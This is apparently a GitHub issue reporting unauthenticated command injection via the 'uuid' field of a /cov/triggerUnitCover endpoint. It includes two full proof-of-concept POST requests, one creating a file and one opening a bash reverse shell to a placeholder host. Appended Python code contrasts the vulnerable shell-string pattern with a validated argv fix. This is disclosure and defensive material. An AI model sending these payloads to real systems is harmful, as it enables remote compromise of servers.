Unauthorized attackers can execute any command with triggerUnitCover Interface #49

Open
gaogaostone opened this issue Oct 28, 2024 · 0 comments


When accessing the triggerUnitCover interface with a specially crafted request, unauthorized attackers can execute any command on the target system. The attacker can inject a command through the parameter uuid.

Proof of concept:

The request for file creation and the results are as follows.
After sending the payload, wait for a period of time (10 seconds by default). Once the scheduled task has executed, you will find that the file has been successfully created.

POST /cov/triggerUnitCover HTTP/1.1
Host: x.x.x.x:8899
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Content-Type: application/json
Content-Length: 272

{
    "envType":"-Ptest",
  "subModule":"",
"uuid":"123yy || touch /tmp/0407_123 ||",
"gitUrl":"http://x.x.x.x:8080/root/haha.git",
"baseVersion":"7965193defdfb86692f6dfcf84f567b1c425f9e5",
"nowVersion":"fa8ffa7a44d469ee654e5b7a58bdb50539301f3d",
"type":"1"
}

[two screenshots, not preserved]

The payload for a reverse shell and the execution results are as follows.
After sending the payload, wait for a period of time (10 seconds by default). Once the scheduled task has executed, you will find that the file has been successfully created.

POST /cov/triggerUnitCover HTTP/1.1
Host: x.x.x.x:8899
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Content-Type: application/json
Content-Length: 296

{
    "envType":"-Ptest",
  "subModule":"",
"uuid":"123yy || bash -i >& /dev/tcp/x.x.x.x/9333 0>&1 ||",
"gitUrl":"http://x.x.x.x:8080/root/haha.git",
"baseVersion":"7965193defdfb86692f6dfcf84f567b1c425f9e5",
"nowVersion":"fa8ffa7a44d469ee654e5b7a58bdb50539301f3d",
"type":"1"
}

[two screenshots, not preserved]
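The injection mechanism behind both payloads, as an added example that is not part of the report above and not the project's own code: Python stands in for whatever language the service is written in, the runner name `unitcover-runner`, the `--uuid`/`--type` flag layout and the allow-list regexes are assumptions, and `echo INJECTED` replaces the reporter's `touch` and reverse-shell commands so the block runs harmlessly. The vulnerable path interpolates the uuid field into one shell string; the hardened path validates the field against a strict pattern and hands an argv list to the runner so no shell ever parses it.

```python
import re
import subprocess

# Constructed request fields mirroring the PoC body (assumed shape, not the project's code).
# The marker `echo INJECTED` stands in for `touch /tmp/0407_123` / the bash reverse shell.
POC_PARAMS = {"uuid": "123yy || echo INJECTED ||", "type": "1"}
SAFE_PARAMS = {"uuid": "123yy", "type": "1"}

# Hypothetical helper binary standing in for whatever the scheduled task invokes.
RUNNER = "unitcover-runner"


def build_vulnerable_command(params, runner=RUNNER):
    """Vulnerable pattern: untrusted request fields pasted into a single shell string."""
    return f"{runner} --uuid {params['uuid']} --type {params['type']}"


def run_vulnerable(params, runner=RUNNER):
    """Run the string through /bin/sh, as a scheduled task doing shell=True would.

    With the PoC uuid the shell sees:
        unitcover-runner --uuid 123yy || echo INJECTED || --type 1
    The runner fails (here it does not even exist), so the `||` branch executes the
    injected command, and the trailing `||` swallows the rest of the original line.
    """
    proc = subprocess.run(build_vulnerable_command(params, runner),
                          shell=True, capture_output=True, text=True)
    return proc.stdout.strip()


# Assumed allow-lists: the report does not say what format uuid/type must have, so this
# accepts only alphanumerics, '-' and '_' for uuid (the PoC's own "123yy" passes) and a
# short digit string for type. Shell metacharacters such as '|', ';', '$' cannot get through.
UUID_RE = re.compile(r"^[A-Za-z0-9_-]{1,64}$")
TYPE_RE = re.compile(r"^[0-9]{1,3}$")


def validate(params):
    """Reject any field that does not match its allow-list; never try to 'clean' it."""
    for field, pattern in (("uuid", UUID_RE), ("type", TYPE_RE)):
        value = params.get(field, "")
        if not pattern.fullmatch(value):
            raise ValueError(f"rejected {field}: {value!r}")
    return params


def build_hardened_argv(params, runner=RUNNER):
    """Hardened pattern: validate first, then build an argv list instead of a string."""
    p = validate(params)
    return [runner, "--uuid", p["uuid"], "--type", p["type"]]


def run_hardened(params, runner=RUNNER):
    """Execute with shell=False: each argv element reaches the runner verbatim."""
    argv = build_hardened_argv(params, runner)
    proc = subprocess.run(argv, shell=False, capture_output=True, text=True)
    return proc.stdout.strip()


def argv_keeps_payload_literal(params):
    """Defence in depth: even without validation, an argv list keeps the PoC payload as
    one argument. Using `echo` as the runner shows it is printed, not executed."""
    argv = ["echo", "--uuid", params["uuid"], "--type", params["type"]]
    proc = subprocess.run(argv, shell=False, capture_output=True, text=True)
    return proc.stdout.strip()


if __name__ == "__main__":
    print("vulnerable stdout:", run_vulnerable(POC_PARAMS))
    print("argv-only stdout :", argv_keeps_payload_literal(POC_PARAMS))
    try:
        run_hardened(POC_PARAMS, runner="echo")
    except ValueError as exc:
        print("hardened:", exc)
```

The order matters: validation on its own is only as good as the regex, and quoting on its own (for example `shlex.quote`) still relies on the shell's parser; passing an argv list removes the shell from the path entirely, and the allow-list then only has to stop arguments the runner itself might misinterpret. The same fix applies to the gitUrl, baseVersion and nowVersion fields, which reach the same command line.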
